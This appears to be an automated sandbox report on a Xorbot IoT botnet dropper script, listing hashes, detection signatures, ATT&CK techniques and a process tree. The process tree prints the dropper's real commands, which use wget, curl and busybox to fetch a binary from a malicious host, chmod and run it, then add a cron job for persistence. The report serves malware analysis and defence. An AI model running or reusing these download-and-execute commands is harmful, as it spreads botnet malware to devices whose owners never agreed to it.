xorbot | a2f3a210e7cddc93c3b7d98d9655baec10c4024093dc7aadc464777ac2dee97e

Analysis

max time kernel
149s
max time network
161s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
27/02/2025, 18:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

ae052a19c0e0a091edd6a9cf7b04fbcf
SHA1

8d4bd6f14dbfc3325ecf82587df87c0188a45198
SHA256

a2f3a210e7cddc93c3b7d98d9655baec10c4024093dc7aadc464777ac2dee97e
SHA512

ee1cf26afa600de9d0eb79365706310bd1ee5b61a0bfa368929d333f502d806423edabebb4254bbc1f31887b4f1761c95b07c8a4c8331d4e124e257d848559e3
SSDEEP

192:x+5QqNPJAyA+AdAgAYA4PAyA+AdAgAYAqoL:x+XNPJdpmnfTPdpmnf0

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalation trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (2149) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
701	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb	703	bins.sh

Renames itself 1 IoCs

pid	Process
704	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.JlRWn5	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/795/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/802/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/803/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/280/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/806/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/910/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/930/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/980/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/2/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/20/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/872/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/900/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/904/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/915/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/937/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/976/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/14/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/738/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/995/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/42/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/756/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/858/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/864/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/874/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/876/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/962/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/742/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/885/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/892/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/284/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/43/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/744/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/751/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/762/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/791/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/792/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/857/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/303/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/649/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/659/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/860/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/869/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/942/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/943/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/968/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/760/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/777/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/998/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/790/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/946/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/313/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/720/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/757/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/804/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/781/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/917/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/168/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/819/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/850/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/878/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/924/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/938/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/971/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
665	wget
680	curl
697	busybox
725	wget

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb	wget
File opened for modification	/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb	curl
File opened for modification	/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:656
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:661
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:665
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:680
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:697
- /bin/chmod
  chmod 777 v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  - File and Directory Permissions Modification
  PID:701
- /tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  ./v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  - Renames itself
  - Reads runtime system information
  PID:703
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:705
  - - /usr/bin/crontab
      crontab -l
      4⤵
      Reads runtime system information
      PID:706
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:708
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:709
- /bin/rm
  rm v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  PID:722
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73
  2⤵
  - System Network Configuration Discovery
  PID:725

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb

Filesize
127KB

MD5
89077b7bd4bcafca7713be43635c4862

SHA1
fc02edb8fba29ea8ee99e6157ef8560334530052

SHA256
78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

SHA512
1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

Download Submit
/var/spool/cron/crontabs/tmp.JlRWn5

Filesize
210B

MD5
b572864d9b4137932c3c9cfdb51f46e4

SHA1
8e5589d5ea7fbffbc1824760659e20f084f8610f

SHA256
6ab19ccf41ba034809a720f584d1f061be4e053805804d6d5c4bb882f5461739

SHA512
c83a6a1f6914c68b9d1956d9c24b22d5d33400516da13f41b17029e4da93e5686801df7efd1fec7df8a97c30b30ab823928ac7bb9870acc769239deb2a7391d7

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads